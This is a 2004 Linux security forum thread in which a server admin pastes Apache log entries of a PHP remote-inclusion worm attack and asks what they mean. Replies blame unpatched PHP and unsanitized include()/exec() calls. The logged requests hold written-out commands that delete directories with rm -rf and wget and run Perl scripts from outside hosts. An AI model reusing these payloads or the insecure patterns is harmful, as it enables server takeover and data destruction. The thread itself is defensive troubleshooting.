LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 12-27-2004, 02:19 AM   #1
NuLLiFiEd
LQ Newbie
 
Registered: Oct 2003
Posts: 19

Rep: Reputation: 0
Help required with a security issue?


Last night it begun... my apache's access_log is flooded with this:


205.214.86.11 - - [26/Dec/2004:22:43:00 +0200] "GET /index.php?action=hxxp://env
idiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp;rm%20-rf%20*;wget%20envidiosos.or
g/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397
a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485
dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20envidiosos.org/~pil
lar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de54
85dd611112;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd6111
14;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/tmp/;rm%2
0-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111
;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/
sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd6111
13;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%20envidiosos.org/~pillar/.zk/sess_1
89f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%
20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/s
ess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd61111
1;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%2
0sess_189f0f0889555397a4de5485dd611113;wget%20envidiosos.org/~pillar/.zk/sess_18
9f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget
%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_
189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_1
89f0f0889555397a4de5485dd611111;


64.62.178.130 - - [27/Dec/2004:00:06:06 +0200] "GET /index.php?action=hxxp://mid
omain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pill
ar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de548
5dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61
1113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pill
ar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de548
5dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61
1114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f08895553
97a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889
555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0
f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0
f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd6111
11%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd6111
14%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f08
89555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f08
89555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp
%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113
%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112
%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485d
d611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f088955539
7a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/m
ail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4
de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f08

etc etc etc


What in the world is this? I tried googling this but found nothing relevant... please help
 
Old 12-27-2004, 03:08 AM   #2
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,289

Rep: Reputation: 378Reputation: 378Reputation: 378Reputation: 378
Looks like one of the PHP exploits going around (possibly the one that uses phpBB. It exploits a PHP remote code execution vulnerability to download and run a Perl script that looks for other sites to exploit (note the wget call in the URL). If you're running any unpatched version of PHP other than the latest (v4 or v5), you'd best update now.

Edited to say: see the sticked "PHP worm" thread in this forum, if you haven't already.

Last edited by btmiller; 12-27-2004 at 03:10 AM.
 
Old 12-27-2004, 03:11 AM   #3
NuLLiFiEd
LQ Newbie
 
Registered: Oct 2003
Posts: 19

Original Poster
Rep: Reputation: 0
I am running php 4.3.10 and as far as I know there's no phpbb hosting.Does this only affect phpbb or any php script?

Still, I get my apache logs flooded... and growing with every hour like nothing else

Thank you for your quick reply.


P.S. I read the sticky, but didnt find something alike (i mean the logs).. or i didnt look "deep" enough

Last edited by NuLLiFiEd; 12-27-2004 at 03:13 AM.
 
Old 12-27-2004, 03:17 AM   #4
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,289

Rep: Reputation: 378Reputation: 378Reputation: 378Reputation: 378
If you're running PHP 4.3.10, you're probably OK (unless there's some unknown vulnerability). You can't stop yourself from getting hit by the exploit attempts, but they won't work.
 
Old 12-27-2004, 10:20 AM   #5
TruckStuff
Member
 
Registered: Apr 2002
Posts: 498

Rep: Reputation: 30
Quote:
Originally posted by btmiller
If you're running PHP 4.3.10, you're probably OK (unless there's some unknown vulnerability). You can't stop yourself from getting hit by the exploit attempts, but they won't work.
I wouldn't count on that. AFAIK, these attacks are exploiting remarkably shitty code, not PHP itself. This could does things like
Code:
include($_GET['some_unsanitized_get_var'];
and
Code:
exec($_GET['some_other_unsanitized_get_var']);
Bottom line: like any other programming language, learn WTF you are doing before you just start coding.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
webmin issue, poss security issue bejiita Slackware 3 11-03-2004 07:07 AM
maximum security required Kropotkin Linux - Security 7 10-30-2004 06:27 PM
Security Issue or normal??? tekmorph Linux - Security 6 09-10-2004 12:35 AM
Directory security issue malcie Linux - Newbie 4 07-18-2003 08:10 AM
Security issue.. marcoc Linux - Newbie 8 05-01-2002 07:14 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 09:33 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration